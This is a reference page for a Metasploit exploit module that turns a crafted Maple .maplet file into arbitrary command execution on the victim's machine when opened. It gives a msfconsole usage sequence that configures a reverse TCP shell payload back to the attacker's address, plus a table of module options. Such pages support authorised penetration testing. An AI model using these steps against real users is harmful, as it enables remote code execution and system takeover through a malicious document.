Maple Maplet File Creation and Command Execution
This module harnesses Maple's ability to create files and execute commands automatically when opening a Maplet. All versions up to 13 are suspected vulnerable. Testing was conducted with version 13 on Windows. Standard security settings prevent code from running in a normal Maple worksheet without user interaction, but those settings do not prevent code in a Maplet from running. For the payload to be executed, an attacker must convince someone to open a specially modified .maplet file with Maple. By doing so, an attacker can execute arbitrary code as the victim user.
Exploit Rank
- Excellent
Exploit Authors
- scriptjunkie
Exploit Targets
- 0 - Windows (default)
- 1 - Windows X64
- 2 - Linux
- 3 - Linux X64
- 4 - Universal CMD
Exploit Usage Information
$ msfconsole
msf > use exploit/multi/fileformat/maple_maplet
msf exploit(maple_maplet) > show payloads
msf exploit(maple_maplet) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(maple_maplet) > set LHOST [MY IP ADDRESS]
msf exploit(maple_maplet) > exploit
Exploit Module Options
| Option | Description |
| --- | --- |
| FILENAME | The output file. (default: msf.maplet) |
| TEMPLATE | The file to infect. (default: ) |
| ContextInformationFile | The information file that contains context information |
| DisablePayloadHandler | Disable the handler code for the selected payload |
| EXE::Custom | Use custom exe instead of automatically generating a payload exe |
| EXE::FallBack | Use the default template in case the specified one is missing |
| EXE::Inject | Set to preserve the original EXE function |
| EXE::OldMethod | Set to use the substitution EXE generation method. |
| EXE::Path | The directory in which to look for the executable template |
| EXE::Template | The executable template file name. |
| EnableContextEncoding | Use transient context when encoding payloads |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |
| WfsDelay | Additional delay when waiting for a session |
